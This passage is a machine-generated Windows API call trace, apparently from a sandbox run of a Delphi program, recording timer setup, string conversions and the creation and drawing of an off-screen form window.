cchWideChar=15, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrMB08st4Timer\x0f", lpUsedDefaultChar=0x0) returned 15 [0039.722] KillTimer (hWnd=0x10162, uIDEvent=0x1) returned 0 [0039.723] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.723] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1668, cchWideChar=4 | out: lpWideCharStr="Left㑴") returned 4 [0039.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca37c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.723] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.723] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1668, cchWideChar=3 | out: lpWideCharStr="Topt㑴") returned 3 [0039.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.723] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.723] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="TTimerೠܝ\x02") returned 6 [0039.723] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.723] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="tmrMU8Per") returned 7 [0039.723] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07çF\x95uÜ¢\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.723] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.723] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x10164 [0039.724] SetWindowLongW (hWnd=0x10164, nIndex=-4, dwNewLong=83758827) returned 112917644 [0039.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrMU8P", cchWideChar=7, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrMU8P", lpUsedDefaultChar=0x0) returned 7 [0039.724] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.724] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x71ca318, cchWideChar=8 | out: lpWideCharStr="Interval") returned 8 [0039.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x71e6e7c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IntervalB", lpUsedDefaultChar=0x0) returned 8 [0039.724] KillTimer (hWnd=0x10164, uIDEvent=0x1) returned 0 [0039.724] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.724] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="OnTimerl") returned 7 [0039.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e02bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.724] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0039.724] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=12, lpWideCharStr=0x71e02b8, cchWideChar=12 | out: lpWideCharStr="tmrMU8PTimer") returned 12 [0039.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrMU8PTimer", cchWideChar=12, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrMU8PTimer", lpUsedDefaultChar=0x0) returned 12 [0039.724] KillTimer (hWnd=0x10164, uIDEvent=0x1) returned 0 [0039.724] SetTimer (hWnd=0x10164, nIDEvent=0x1, uElapse=0xea60, lpTimerFunc=0x0) returned 0x1 [0039.725] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.725] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1680, cchWideChar=4 | out: lpWideCharStr="Left浩牥") returned 4 [0039.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.725] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.725] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1680, cchWideChar=3 | out: lpWideCharStr="Topt浩牥") returned 3 [0039.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca37c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.725] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0039.725] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6dba33d, cbMultiByte=10, lpWideCharStr=0x71dfe84, cchWideChar=11 | out: lpWideCharStr="TFrmMwM41n") returned 10 [0039.725] GetWindowLongW (hWnd=0x70144, nIndex=-20) returned 384 [0039.725] SetWindowLongW (hWnd=0x70144, nIndex=-20, dwNewLong=256) returned 384 [0039.725] DefWindowProcW (hWnd=0x70144, Msg=0x7c, wParam=0xffffffec, lParam=0x68ff4ac) returned 0x0 [0039.725] DefWindowProcW (hWnd=0x70144, Msg=0x7d, wParam=0xffffffec, lParam=0x68ff4ac) returned 0x0 [0039.725] DefWindowProcW (hWnd=0x70144, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x180117 [0039.726] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TFrmMwM41n", lpWndClass=0x68ff574 | out: lpWndClass=0x68ff574) returned 0 [0039.726] RegisterClassW (lpWndClass=0x68ff5c0) returned 0xc10d [0039.726] CreateWindowExW (dwExStyle=0x10000, lpClassName="TFrmMwM41n", lpWindowName="FrmMwM41n", dwStyle=0x6cf0000, X=-452, Y=-452, nWidth=320, nHeight=240, hWndParent=0x70144, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x10166 [0039.726] IsWindowUnicode (hWnd=0x10166) returned 1 [0039.726] SetWindowLongW (hWnd=0x10166, nIndex=-4, dwNewLong=83759048) returned 113834568 [0039.726] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.727] SetPropW (hWnd=0x10166, lpString=0xc031, hData=0x71713c0) returned 1 [0039.727] SetPropW (hWnd=0x10166, lpString=0xc032, hData=0x71713c0) returned 1 [0039.727] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x24, wParam=0x0, lParam=0x68ff000) returned 0x0 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.727] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x81, wParam=0x0, lParam=0x68fefdc) returned 0x1 [0039.727] SetMenu (hWnd=0x10166, hMenu=0x0) returned 1 [0039.727] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x46, wParam=0x0, lParam=0x68fec04) returned 0x0 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.727] GetCurrentThreadId () returned 0xc04 [0039.728] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x83, wParam=0x1, lParam=0x68febd8) returned 0x0 [0039.728] GetCurrentThreadId () returned 0xc04 [0039.728] GetCurrentThreadId () returned 0xc04 [0039.728] GetCurrentThreadId () returned 0xc04 [0039.728] GetCurrentThreadId () returned 0xc04 [0039.728] GetCurrentThreadId () returned 0xc04 [0039.728] GetCurrentThreadId () returned 0xc04 [0039.728] IsIconic (hWnd=0x10166) returned 0 [0039.728] GetWindowRect (in: hWnd=0x10166, lpRect=0x68fe870 | out: lpRect=0x68fe870) returned 1 [0039.728] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.728] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x47, wParam=0x0, lParam=0x68fec04) returned 0x0 [0039.728] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x3, wParam=0x0, lParam=0xfe5afe44) returned 0x0 [0039.728] IsIconic (hWnd=0x10166) returned 0 [0039.728] GetWindowRect (in: hWnd=0x10166, lpRect=0x68fe340 | out: lpRect=0x68fe340) returned 1 [0039.728] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.728] GetCurrentThreadId () returned 0xc04 [0039.729] GetCurrentThreadId () returned 0xc04 [0039.729] GetCurrentThreadId () returned 0xc04 [0039.729] GetCurrentThreadId () returned 0xc04 [0039.729] GetCurrentThreadId () returned 0xc04 [0039.729] GetCurrentThreadId () returned 0xc04 [0039.729] IsIconic (hWnd=0x10166) returned 0 [0039.729] GetWindowRect (in: hWnd=0x10166, lpRect=0x68fe31c | out: lpRect=0x68fe31c) returned 1 [0039.729] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.729] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x5, wParam=0x0, lParam=0xca0130) returned 0x0 [0039.729] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68fe34c, fWinIni=0x0 | out: pvParam=0x68fe34c) returned 1 [0039.729] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.729] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.729] IsIconic (hWnd=0x10166) returned 0 [0039.729] GetClientRect (in: hWnd=0x10166, lpRect=0x68fe330 | out: lpRect=0x68fe330) returned 1 [0039.729] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.729] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.729] IsIconic (hWnd=0x10166) returned 0 [0039.729] GetClientRect (in: hWnd=0x10166, lpRect=0x68fe330 | out: lpRect=0x68fe330) returned 1 [0039.729] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.729] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.729] IsIconic (hWnd=0x10166) returned 0 [0039.729] GetClientRect (in: hWnd=0x10166, lpRect=0x68fe300 | out: lpRect=0x68fe300) returned 1 [0039.729] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.729] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.729] IsIconic (hWnd=0x10166) returned 0 [0039.729] GetClientRect (in: hWnd=0x10166, lpRect=0x68fe300 | out: lpRect=0x68fe300) returned 1 [0039.729] FlatSB_SetScrollProp (param_1=0x10166, index=0x100, newValue=0x0, param_4=0) returned 0 [0039.729] GetSysColor (nIndex=20) returned 0xffffff [0039.729] FlatSB_SetScrollProp (param_1=0x10166, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0039.729] FlatSB_SetScrollInfo (param_1=0x10166, code=1, psi=0x68fe33c, fRedraw=1) returned 0 [0039.730] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0039.730] GetCurrentThreadId () returned 0xc04 [0039.730] GetCurrentThreadId () returned 0xc04 [0039.730] GetCurrentThreadId () returned 0xc04 [0039.730] GetCurrentThreadId () returned 0xc04 [0039.730] GetCurrentThreadId () returned 0xc04 [0039.730] GetCurrentThreadId () returned 0xc04 [0039.730] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0039.730] GetCurrentThreadId () returned 0xc04 [0039.731] GetCurrentThreadId () returned 0xc04 [0039.731] GetCurrentThreadId () returned 0xc04 [0039.731] GetCurrentThreadId () returned 0xc04 [0039.731] GetCurrentThreadId () returned 0xc04 [0039.731] GetCurrentThreadId () returned 0xc04 [0039.731] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0039.731] GetCurrentThreadId () returned 0xc04 [0039.731] GetCurrentThreadId () returned 0xc04 [0039.731] GetCurrentThreadId () returned 0xc04 [0039.731] GetCurrentThreadId () returned 0xc04 [0039.731] GetCurrentThreadId () returned 0xc04 [0039.731] GetCurrentThreadId () returned 0xc04 [0039.732] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.732] IsIconic (hWnd=0x10166) returned 0 [0039.732] GetClientRect (in: hWnd=0x10166, lpRect=0x68fe300 | out: lpRect=0x68fe300) returned 1 [0039.732] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.732] IsIconic (hWnd=0x10166) returned 0 [0039.732] GetClientRect (in: hWnd=0x10166, lpRect=0x68fe300 | out: lpRect=0x68fe300) returned 1 [0039.732] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.732] IsIconic (hWnd=0x10166) returned 0 [0039.732] GetClientRect (in: hWnd=0x10166, lpRect=0x68fe300 | out: lpRect=0x68fe300) returned 1 [0039.732] FlatSB_SetScrollProp (param_1=0x10166, index=0x200, newValue=0x0, param_4=0) returned 0 [0039.732] GetSysColor (nIndex=20) returned 0xffffff [0039.732] FlatSB_SetScrollProp (param_1=0x10166, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0039.732] FlatSB_SetScrollInfo (param_1=0x10166, code=0, psi=0x68fe33c, fRedraw=1) returned 0 [0039.733] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.733] IsIconic (hWnd=0x10166) returned 0 [0039.733] GetClientRect (in: hWnd=0x10166, lpRect=0x68fe300 | out: lpRect=0x68fe300) returned 1 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.733] GetCurrentThreadId () returned 0xc04 [0039.734] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x83, wParam=0x1, lParam=0x68fe800) returned 0x0 [0039.734] GetCurrentThreadId () returned 0xc04 [0039.734] GetCurrentThreadId () returned 0xc04 [0039.734] GetCurrentThreadId () returned 0xc04 [0039.734] GetCurrentThreadId () returned 0xc04 [0039.734] GetCurrentThreadId () returned 0xc04 [0039.734] GetCurrentThreadId () returned 0xc04 [0039.734] GetSystemMenu (hWnd=0x10166, bRevert=0) returned 0x3016f [0039.734] GetCurrentThreadId () returned 0xc04 [0039.734] GetCurrentThreadId () returned 0xc04 [0039.734] GetCurrentThreadId () returned 0xc04 [0039.734] GetCurrentThreadId () returned 0xc04 [0039.734] GetCurrentThreadId () returned 0xc04 [0039.734] GetCurrentThreadId () returned 0xc04 [0039.735] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x83, wParam=0x0, lParam=0x68ff020) returned 0x0 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x1, wParam=0x0, lParam=0x68fefc0) returned 0x0 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetWindowLongW (hWnd=0x10166, nIndex=-20) returned 65792 [0039.735] SetWindowLongW (hWnd=0x10166, nIndex=-20, dwNewLong=65792) returned 65792 [0039.735] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x7c, wParam=0xffffffec, lParam=0x68ff3d0) returned 0x0 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.735] GetCurrentThreadId () returned 0xc04 [0039.736] GetCurrentThreadId () returned 0xc04 [0039.736] GetCurrentThreadId () returned 0xc04 [0039.736] GetCurrentThreadId () returned 0xc04 [0039.736] GetCurrentThreadId () returned 0xc04 [0039.736] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x7d, wParam=0xffffffec, lParam=0x68ff3d0) returned 0x0 [0039.736] GetCurrentThreadId () returned 0xc04 [0039.736] GetCurrentThreadId () returned 0xc04 [0039.736] GetCurrentThreadId () returned 0xc04 [0039.736] GetCurrentThreadId () returned 0xc04 [0039.736] GetCurrentThreadId () returned 0xc04 [0039.736] GetCurrentThreadId () returned 0xc04 [0039.736] RedrawWindow (hWnd=0x10166, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x485) returned 1 [0039.736] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.736] IsIconic (hWnd=0x10166) returned 0 [0039.736] GetWindowRect (in: hWnd=0x10166, lpRect=0x68ff504 | out: lpRect=0x68ff504) returned 1 [0039.736] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.736] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x30, wParam=0x130a01ce, lParam=0x1) returned 0x0 [0039.736] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.736] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.736] IsIconic (hWnd=0x10166) returned 0 [0039.737] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff620 | out: lpRect=0x68ff620) returned 1 [0039.737] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.737] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.737] IsIconic (hWnd=0x10166) returned 0 [0039.737] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff620 | out: lpRect=0x68ff620) returned 1 [0039.737] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.737] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.737] IsIconic (hWnd=0x10166) returned 0 [0039.737] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff5f0 | out: lpRect=0x68ff5f0) returned 1 [0039.737] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.737] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.737] IsIconic (hWnd=0x10166) returned 0 [0039.737] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff5f0 | out: lpRect=0x68ff5f0) returned 1 [0039.737] FlatSB_SetScrollProp (param_1=0x10166, index=0x100, newValue=0x0, param_4=0) returned 0 [0039.737] GetSysColor (nIndex=20) returned 0xffffff [0039.737] FlatSB_SetScrollProp (param_1=0x10166, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0039.737] FlatSB_SetScrollInfo (param_1=0x10166, code=1, psi=0x68ff62c, fRedraw=1) returned 0 [0039.738] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.738] IsIconic (hWnd=0x10166) returned 0 [0039.738] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff5f0 | out: lpRect=0x68ff5f0) returned 1 [0039.738] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.738] IsIconic (hWnd=0x10166) returned 0 [0039.738] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff5f0 | out: lpRect=0x68ff5f0) returned 1 [0039.738] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.738] IsIconic (hWnd=0x10166) returned 0 [0039.738] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff5f0 | out: lpRect=0x68ff5f0) returned 1 [0039.738] FlatSB_SetScrollProp (param_1=0x10166, index=0x200, newValue=0x0, param_4=0) returned 0 [0039.738] GetSysColor (nIndex=20) returned 0xffffff [0039.738] FlatSB_SetScrollProp (param_1=0x10166, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0039.738] FlatSB_SetScrollInfo (param_1=0x10166, code=0, psi=0x68ff62c, fRedraw=1) returned 0 [0039.739] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.739] IsIconic (hWnd=0x10166) returned 0 [0039.739] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff5f0 | out: lpRect=0x68ff5f0) returned 1 [0039.739] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0039.739] SendMessageW (hWnd=0x10166, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0039.739] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0039.740] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x20161 [0039.740] GetCurrentThreadId () returned 0xc04 [0039.740] GetCurrentThreadId () returned 0xc04 [0039.740] GetCurrentThreadId () returned 0xc04 [0039.740] GetCurrentThreadId () returned 0xc04 [0039.740] GetCurrentThreadId () returned 0xc04 [0039.740] GetCurrentThreadId () returned 0xc04 [0039.742] GetCurrentThreadId () returned 0xc04 [0039.742] GetCurrentThreadId () returned 0xc04 [0039.742] GetCurrentThreadId () returned 0xc04 [0039.742] GetCurrentThreadId () returned 0xc04 [0039.742] GetCurrentThreadId () returned 0xc04 [0039.742] GetCurrentThreadId () returned 0xc04 [0039.742] SetPropW (hWnd=0x10166, lpString=0xc031, hData=0x71713c0) returned 1 [0039.742] SetPropW (hWnd=0x10166, lpString=0xc032, hData=0x71713c0) returned 1 [0039.742] GetCurrentThreadId () returned 0xc04 [0039.742] GetCurrentThreadId () returned 0xc04 [0039.742] GetDC (hWnd=0x10166) returned 0x1901023f [0039.742] GetCurrentThreadId () returned 0xc04 [0039.742] MoveToEx (in: hdc=0x1901023f, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0039.742] SelectObject (hdc=0x1901023f, h=0x130a01ce) returned 0x18a002e [0039.742] GetSysColor (nIndex=8) returned 0x0 [0039.742] SetTextColor (hdc=0x1901023f, color=0x0) returned 0x0 [0039.742] GetTextExtentPoint32W (in: hdc=0x1901023f, lpString="0", c=1, psizl=0x68ff6f4 | out: psizl=0x68ff6f4) returned 1 [0039.743] IsIconic (hWnd=0x10166) returned 0 [0039.743] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff6e4 | out: lpRect=0x68ff6e4) returned 1 [0039.743] IsIconic (hWnd=0x10166) returned 0 [0039.743] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff6dc | out: lpRect=0x68ff6dc) returned 1 [0039.743] IsIconic (hWnd=0x10166) returned 0 [0039.743] SetWindowPos (hWnd=0x10166, hWndInsertAfter=0x0, X=-452, Y=-452, cx=194, cy=240, uFlags=0x14) returned 1 [0039.743] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x46, wParam=0x0, lParam=0x68ff634) returned 0x0 [0039.743] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x24, wParam=0x0, lParam=0x68ff064) returned 0x0 [0039.743] GetCurrentThreadId () returned 0xc04 [0039.743] GetCurrentThreadId () returned 0xc04 [0039.743] SelectObject (hdc=0x1901023f, h=0x1b00017) returned 0x1b00017 [0039.743] SelectObject (hdc=0x1901023f, h=0x1900015) returned 0x1900010 [0039.743] SelectObject (hdc=0x1901023f, h=0x18a002e) returned 0x130a01ce [0039.743] GetCurrentPositionEx (in: hdc=0x1901023f, lppt=0x68fee98 | out: lppt=0x68fee98) returned 1 [0039.743] GetCurrentThreadId () returned 0xc04 [0039.743] GetCurrentThreadId () returned 0xc04 [0039.743] ReleaseDC (hWnd=0x10166, hDC=0x1901023f) returned 1 [0039.743] GetCurrentThreadId () returned 0xc04 [0039.743] GetCurrentThreadId () returned 0xc04 [0039.743] GetCurrentThreadId () returned 0xc04 [0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x83, wParam=0x1, lParam=0x68ff608) returned 0x0 [0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] GetCurrentThreadId () returned 0xc04 